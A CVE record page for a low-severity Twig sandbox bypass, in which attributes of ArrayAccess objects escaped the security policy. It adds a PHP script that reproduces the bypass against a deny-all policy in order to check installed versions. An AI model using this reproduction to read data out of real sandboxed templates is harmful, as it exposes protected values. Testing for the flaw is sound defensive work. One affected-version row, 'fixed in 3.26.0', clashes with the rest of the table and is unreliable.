CVE-2024-51755
published 2024-11-06


Priority: P4 (low)
CVSS 3.1 base score: 2.2 / 10 (low)
CVSS 3.1 vector: AV:N / AC:H / PR:H / UI:N / S:U / C:L / I:N / A:N
EPSS: 0.41% (percentile 33.1)
Twig is a template language for PHP. In a sandbox, an attacker can access attributes of Array-like objects (objects implementing ArrayAccess) because they were not checked by the security policy: the attribute lookup resolved such objects through the array-index path, which never consulted the sandbox policy. They are now checked via the property policy, and the `__isset()` method is now called after the security check instead of before it. This is a backwards-compatibility (BC) break. This issue has been patched in versions 3.11.2 and 3.14.1. All users are advised to upgrade. There are no known workarounds for this issue.
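The following is an added example, not code from the CVE record or from the Twig project. It reproduces the condition the description refers to so that an installed Twig version can be checked: a sandboxed template reads an attribute of an object that implements ArrayAccess while the security policy allows no properties at all. On an unpatched release the value is rendered; on a patched release the lookup is refused with a SecurityError. The `Config` class, its `secret` key and the Composer layout (`composer require twig/twig`, PHP 8.0+) are assumptions made for the example.

```php
<?php
// Added example, not part of the CVE page or of Twig itself. Assumes Twig was
// installed with Composer (composer require twig/twig) so vendor/autoload.php
// exists next to this script. Class name, key and value are constructed.

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// A plain object would be resolved through the property branch of the attribute
// lookup, which is guarded by the sandbox policy. Implementing ArrayAccess makes
// `{{ obj.secret }}` resolve through offsetExists()/offsetGet() instead, and that
// branch did not consult the policy before the fix.
final class Config implements ArrayAccess
{
    private array $data = ['secret' => 'db-password-123'];   // constructed value

    public function offsetExists(mixed $offset): bool  { return isset($this->data[$offset]); }
    public function offsetGet(mixed $offset): mixed    { return $this->data[$offset]; }
    public function offsetSet(mixed $offset, mixed $value): void { $this->data[$offset] = $value; }
    public function offsetUnset(mixed $offset): void   { unset($this->data[$offset]); }
}

// Deny-everything policy: no tags, filters, methods, properties or functions.
// Any attribute access that the sandbox actually checks must therefore fail.
$policy = new SecurityPolicy([], [], [], [], []);

$twig = new Environment(new ArrayLoader([
    'attr'  => '{{ obj.secret }}',      // dot syntax, ANY_CALL lookup
    'index' => "{{ obj['secret'] }}",   // bracket syntax, ARRAY_CALL lookup
]));
// sandboxed = true makes every template sandboxed, not only {% sandbox %} blocks.
$twig->addExtension(new SandboxExtension($policy, true));

foreach (['attr', 'index'] as $name) {
    try {
        $out = $twig->render($name, ['obj' => new Config()]);
        // Reached on < 3.11.2 and on 3.12.0 - 3.14.0: the policy was never asked.
        printf("%-5s VULNERABLE: sandbox rendered \"%s\"\n", $name, $out);
    } catch (SecurityError $e) {
        // Reached on >= 3.11.2 / >= 3.14.1: the property policy rejects the access.
        printf("%-5s patched: %s\n", $name, $e->getMessage());
    }
}
```

Run it with `php check.php` against each Twig release you ship; the same object used without the sandbox extension renders the value on every version, which is expected, because the policy only applies inside the sandbox. Note that the patched behaviour is the BC break the description mentions: templates that relied on reading ArrayAccess objects inside a sandbox now need those keys listed as allowed properties in the SecurityPolicy.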

Affected (6 ranges)

Vendor    Product    Version range                Fixed in
debian    php-twig   < php-twig 3.14.2-1 (forky)  php-twig 3.14.2-1 (forky)
twig      twig       >= 0, < 3.26.0               3.26.0
twig      twig       >= 0, < 3.11.2               3.11.2
twig      twig       >= 3.12, < 3.14.1            3.14.1
twigphp   twig       < 3.11.2                     3.11.2
twigphp   twig       -                            -

CVSS provenance

Source          CVSS version   Score   Severity   Vector
nvd             3.1            2.2     LOW        CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N
ghsa            -              2.2     LOW        -
osv             -              2.2     LOW        -
vendor_debian   -              2.2     LOW        -